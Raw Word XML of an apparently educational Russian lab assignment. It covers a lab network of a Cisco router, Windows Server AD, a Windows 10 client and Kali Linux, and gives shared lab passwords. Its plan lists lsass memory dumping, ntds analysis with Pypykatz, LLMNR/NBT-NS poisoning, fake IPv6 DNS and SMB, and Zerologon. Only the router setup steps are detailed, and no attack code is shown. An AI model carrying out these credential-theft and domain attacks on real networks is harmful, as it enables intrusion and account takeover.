          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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6" w:name="_heading=h.56j6zvdmqmgg"/>
      <w:r/>
      <w:bookmarkEnd w:id="6"/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Windows server Administrator/P@ssw0rd;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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7" w:name="_heading=h.ook3lfp349b8"/>
      <w:r/>
      <w:bookmarkEnd w:id="7"/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Windows 10 admin/P@ssw0rd;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:right="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u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8" w:name="_heading=h.jn7l1lmzc8ox"/>
      <w:r/>
      <w:bookmarkEnd w:id="8"/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Kali Linux kali/kali.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Пройти аутентификацию согласно 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списку вариантов.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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Перед выполнением задания для каждой из виртуальной машины необходимо загрузить стартовый снапшот. Для этого нажать правой кнопкой на виртуальную машину </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—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 Snapshots </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">— 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restore snapshot). После окончания процесса восстановления включить виртуальную машину.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="360" w:after="160" w:line="259" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl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9" w:name="_heading=h.t5bl2lxyg1ut"/>
      <w:r/>
      <w:bookmarkEnd w:id="9"/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 xml:space="preserve">Практическое задание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left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="320" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/>
        <w:rPr>
          <w:color w:val="434343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10" w:name="_heading=h.oeezbov8fpyw"/>
      <w:r/>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Схема лабораторного стенда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibr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324713" cy="3079007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  <pic:nvPr/>
                      </pic:nvPicPr>
                      <pic:blipFill>
                        <a:blip r:embed="rId11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6324713" cy="30790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98.01pt;height:242.44pt;mso-wrap-distance-left:0.00pt;mso-wrap-distance-top:0.00pt;mso-wrap-distance-right:0.00pt;mso-wrap-distance-bottom:0.00pt;">
                <v:path textboxrect="0,0,0,0"/>
                <v:imagedata r:id="rId11" o:title=""/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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tl w:val="0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spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs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highlight w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none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План работы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить конфигурацию виртуального маршрутизатора Cisco.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить настройку Active Directory на Windows Server.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Включить в состав домена клиента Windows 10.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Установить Kali Linux, выполнить начальную конфигурацию.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить сохранение дампа памяти процесса lsass.exe, исследование учётных записей.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить анализ базы данных ntds с помощью Pypykatz, удалённое выполнение команд.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить отравление кеша LLMNR и NBT-NS.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:line="259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Выполнить встраивание поддельного сервера DNS IPv6 и поддельного SMB ресурса.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0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:spacing w:after="160" w:line="259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Выполнить атаку Zerologon.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0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:keepLines/>
        <w:keepNext/>
        <w:pageBreakBefore w:val="0"/>
        <w:spacing w:before="320" w:after="80" w:line="276" w:lineRule="auto"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:widowControl/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000000" w:themeColor="text1"/>
        </w:rPr>
      </w:r>
      <w:bookmarkStart w:id="11" w:name="_heading=h.wjth59aqazfs"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:r>
      <w:bookmarkEnd w:id="11"/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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Порядок выполнения работы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8"/>
          <w:szCs w:val="28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8"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360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Конфигурация виртуального маршрутизатора:</w:t>
      </w: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eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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открыть консоль виртуального маршрутизатора PODX-CSR. Убедиться в том, что маршрутизатор отвечает на команды;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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выполнить конфигурацию имени устройства, создать локального пользователя admin с паролем P@ssw0rd. Установить проверку пароля при подключении к консоли маршрутизатора;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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выполнить конфигурацию интерфейсов маршрутизатора согласно схеме стенда. Включить интерфейсы;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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выполнить настройку NAT таким образом, чтобы пакеты из сети 10.0.X.0/24 приходили на интерфейс;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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выполнить конфигурацию SSH. Ограничить возможность подключения SSH к маршрутизатору адресом 10.0.X.6;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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выполнить конфигурацию сервера DHCP. В качестве сети использовать адрес сети 10.0.X.0/24, основной шлюз </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—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 маршрутизатор, DNS-сервер </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="4d5156"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:highlight w:val="white"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—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 адрес контроллера домена;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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сохранить конфигурацию;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1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="1080" w:hanging="360"/>
        <w:spacing w:line="259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i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">добавить в отчёт скриншоты конфигурации маршрутизатора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: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pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none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I</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">P адреса интерфейсов,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">правило трансляции NAT,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="879"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="13"/>
        </w:numPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">настройка интерфейсов VTY.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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tl w:val="0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ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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tl w:val="0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ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs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bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto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tl w:val="0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ind w:left="0" w:firstLine="0"/>
        <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri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Справочник команд</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="882"/>
        <w:tblW w:w="8265" w:type="dxa"/>
        <w:tblInd w:w="108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117"/>
        <w:gridCol w:w="4148"/>
        <w:tblGridChange w:id="1">
          <w:tblGrid>
            <w:gridCol w:w="4117"/>
            <w:gridCol w:w="4148"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:gridSpan w:val="2"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
              <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Общие команды</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Proxima Nova" w:hAnsi="Proxima Nova" w:eastAsia="Proxima Nova" w:cs="Proxima Nova"/>
                <w:b/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tblPrEx/>
        <w:trPr>
          <w:cantSplit w:val="false"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p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enable/exit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  <w:tc>
          <w:tcPr>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
